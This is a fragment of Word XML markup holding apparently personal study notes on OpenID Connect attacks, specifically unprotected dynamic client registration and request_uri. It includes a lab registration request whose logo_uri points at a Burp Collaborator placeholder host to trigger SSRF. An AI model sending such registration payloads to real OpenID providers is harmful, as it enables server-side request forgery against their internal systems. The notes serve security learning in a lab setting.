          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1978">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>End user</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1978">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> - resource owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50988562" w14:textId="05E5BA3E" w:rsidR="00DC1978" w:rsidRPr="00DC1978" w:rsidRDefault="00DC1978" w:rsidP="00DC1978">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1978">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>OpenID provider</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1978">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> - OAuth service </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401AE670" w14:textId="77777777" w:rsidR="00704F80" w:rsidRPr="008026BD" w:rsidRDefault="00704F80" w:rsidP="00704F80">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unprotected dynamic client registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A005DBB" w14:textId="6C5C9149" w:rsidR="00704F80" w:rsidRPr="008026BD" w:rsidRDefault="00704F80" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Client application </w:t>
      </w:r>
      <w:r w:rsidR="00931714" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>register with OpenID provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7E7D37" w14:textId="77777777" w:rsidR="00704F80" w:rsidRPr="008026BD" w:rsidRDefault="00704F80" w:rsidP="00B9084F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2AF059"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POST /openid/register HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535362B8"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Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FF0542"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Accept: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12799BB5"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Host: oauth-authorization-server.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57235A" w14:textId="0ADF5CAB"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Authorization: Bearer ab12cd34ef56gh89</w:t>
      </w:r>
      <w:r w:rsidR="000B2498" w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4212A"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p>
    <w:p w14:paraId="63A9308E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB8B1CB"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"application_type": "web",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04899C68"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"redirect_uris": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E41E560"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"https://client-app.com/callback",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31095211"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"https://client-app.com/callback2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9E26E0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47462AE7"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"client_name": "My Application",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E8BD5A"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w:t>
      </w:r>
      <w:r w:rsidRPr="00704F80">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>logo_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="00704F80">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>": "</w:t>
      </w:r>
      <w:r w:rsidRPr="00704F80">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>https://client-app.com/logo.png</w:t>
      </w:r>
      <w:r w:rsidRPr="00704F80">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B512F1"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"token_endpoint_auth_method": "client_secret_basic",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA47AF2" w14:textId="77777777" w:rsidR="00704F80" w:rsidRPr="00704F80" w:rsidRDefault="00704F80" w:rsidP="00704F80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00704F80">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00704F80">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>"jwks_uri": "https://client-app.com/my_public_keys.jwks",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0D7620"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eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00704F80">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>"userinfo_encrypted_response_alg": "RSA1_5",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417965CB"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"userinfo_encrypted_response_enc": "A128CBC-HS256",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6942F11D" w14:textId="77777777" w:rsidR="00704F80" w:rsidRPr="00704F80" w:rsidRDefault="00704F80" w:rsidP="00704F80">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00704F80">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">    …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573565B5" w14:textId="64B70F0D" w:rsidR="008216C7" w:rsidRPr="008026BD" w:rsidRDefault="00704F80" w:rsidP="00704F80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3CB80" w14:textId="2E63526C" w:rsidR="008026BD" w:rsidRPr="008026BD" w:rsidRDefault="008026BD" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="1" w:after="120" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The OpenID provider will access </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logo_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to load the logo of the client application </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at some step (find it!!!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8F0F2" w14:textId="6D1387C3" w:rsidR="008026BD" w:rsidRPr="008026BD" w:rsidRDefault="008026BD" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="1" w:after="120" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=&gt; A</w:t>
      </w:r>
      <w:r w:rsidR="000B2498" w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttacker can register with malious input value, e.g., to trigger SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DD4131" w14:textId="1EADB2C1" w:rsidR="000B2498" w:rsidRPr="008026BD" w:rsidRDefault="000B2498" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="1" w:after="120" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>First, we need to find the registration endpoint =&gt; Recon part</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF4BD7" w14:textId="2B88DEBA" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00B9084F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="1" w:after="120" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then try to register with OpenID provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D310A" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>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lastRenderedPageBreak/>
        <w:t>POST /reg HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF323D" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>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Host: YOUR-LAB-OAUTH-SERVER.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F70D54" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>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Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC707B6" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447FB3CC" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72217B6A" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>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 xml:space="preserve">    "redirect_uris" : [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09887757" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>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 xml:space="preserve">        "https://example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5356F263" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>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 xml:space="preserve">    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D9921" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>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 xml:space="preserve">    "logo_uri" : "https://BURP-COLLABORATOR-SUBDOMAIN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F92F8E" w14:textId="77777777" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="00931714" w:rsidP="00931714">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="1" w:after="120" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6202E178" w14:textId="77777777" w:rsidR="008026BD" w:rsidRPr="008026BD" w:rsidRDefault="008026BD" w:rsidP="008026BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Allowing authorization requests by reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579ABF9" w14:textId="24691261" w:rsidR="00931714" w:rsidRPr="008026BD" w:rsidRDefault="008026BD" w:rsidP="00931714">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="1" w:after="120" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instead of s</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubmitting the required parameters for the authorization request via the query string</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can use </w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that points to a JWT containing these parameters =&gt; SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01803E1C" w14:textId="43413EA2" w:rsidR="00E1008C" w:rsidRPr="008026BD" w:rsidRDefault="008026BD" w:rsidP="008026BD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="1" w:after="120" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="008026BD">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be used to bypass validation of these paramate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rs</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E1008C" w:rsidRPr="008026BD" w:rsidSect="00AF4E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55C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4130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2EDE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="678C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41BC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D3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5139F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01A0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94915"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEAE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50F90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="734C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TextsAlreadyFilled" w:val="True"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00AF4E2A"/>
    <w:rsid w:val="00020AC2"/>
    <w:rsid w:val="00061A4E"/>
    <w:rsid w:val="00097970"/>
    <w:rsid w:val="000B2498"/>
    <w:rsid w:val="001000EB"/>
    <w:rsid w:val="001026BB"/>
    <w:rsid w:val="00106DF5"/>
    <w:rsid w:val="00193293"/>
    <w:rsid w:val="00204B8C"/>
    <w:rsid w:val="002F2A6F"/>
    <w:rsid w:val="00302AF5"/>
    <w:rsid w:val="003E416C"/>
    <w:rsid w:val="0044057A"/>
    <w:rsid w:val="004465BD"/>
    <w:rsid w:val="0049341A"/>
    <w:rsid w:val="004B07DC"/>
    <w:rsid w:val="004D2706"/>
    <w:rsid w:val="004D3836"/>
    <w:rsid w:val="00500EAD"/>
    <w:rsid w:val="005D1CAA"/>
    <w:rsid w:val="00606A92"/>
    <w:rsid w:val="006374C4"/>
    <w:rsid w:val="00646BB7"/>
    <w:rsid w:val="00683566"/>
    <w:rsid w:val="00704F80"/>
    <w:rsid w:val="00727A5C"/>
    <w:rsid w:val="0076788B"/>
    <w:rsid w:val="00780A91"/>
    <w:rsid w:val="00781042"/>
    <w:rsid w:val="007A23E9"/>
    <w:rsid w:val="007A5691"/>
    <w:rsid w:val="007C5599"/>
    <w:rsid w:val="007D676B"/>
    <w:rsid w:val="008026BD"/>
    <w:rsid w:val="008216C7"/>
    <w:rsid w:val="00834DCF"/>
    <w:rsid w:val="008533C1"/>
    <w:rsid w:val="0089554D"/>
    <w:rsid w:val="008C41DB"/>
    <w:rsid w:val="00901372"/>
    <w:rsid w:val="00931714"/>
    <w:rsid w:val="00950DD4"/>
    <w:rsid w:val="00A40A64"/>
    <w:rsid w:val="00AF10A3"/>
    <w:rsid w:val="00AF4E2A"/>
    <w:rsid w:val="00B4469E"/>
    <w:rsid w:val="00B9084F"/>
    <w:rsid w:val="00BA4193"/>
    <w:rsid w:val="00C24CCB"/>
    <w:rsid w:val="00C45908"/>
    <w:rsid w:val="00C705B2"/>
    <w:rsid w:val="00CB5591"/>
    <w:rsid w:val="00CD099E"/>
    <w:rsid w:val="00CF3B49"/>
    <w:rsid w:val="00D06A6F"/>
    <w:rsid w:val="00D62137"/>
    <w:rsid w:val="00D84899"/>
    <w:rsid w:val="00DC1978"/>
    <w:rsid w:val="00DC3975"/>
    <w:rsid w:val="00DF644B"/>
    <w:rsid w:val="00E1008C"/>
    <w:rsid w:val="00E541E4"/>
